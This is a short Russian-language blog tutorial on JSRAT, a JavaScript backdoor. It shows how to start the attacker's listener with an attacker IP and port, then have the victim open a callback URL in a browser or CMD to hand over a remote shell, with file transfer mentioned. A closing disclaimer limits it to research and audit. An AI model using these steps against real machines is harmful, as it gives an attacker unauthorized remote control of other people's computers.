JSRAT — Javascript бэкдор для управления машиной жертвы

JSRAT — это скрипт python, который можно использовать для получения удаленного шелла жертвы.

Установка и настройка

Скачайте инструмент JSRAT здесь

Загрузите и дайте соответствующее разрешение для выполнения скрипта. Рисунок показывает полную установку

Запуск веб-сервера

Запустите и выполните команду:

 

 # python JSRAT.py -i <kali Linux или Attacker Ip> -p 8080 

 

JSRAT предоставляет список URLs.
Скопируйте клиентскую команду для http://192.168.172.143:8080/wtf

Машина жертвы

Откройте этот URL-адрес с помощью браузера жертвы.

Чтобы получить удаленный шелл, сгенерированным URL-адресом, следует открыть с помощью CMD.

После выполнения команды будет получена оболочка.

Возвращаемся на машину атакующего

Вот так !!! Мы подключились к машине жертвы

Попробуем выполнить команду windows: Ipconfig

На приведенном выше рисунке показано, что выполнение команды calc открывает калькулятор windows.

JSRat также может предоставлять файлы загрузки, чтения и скачивания.

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

cryptoparty

Cryptography is typically bypassed, not penetrated.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

5e7fa976b0640d40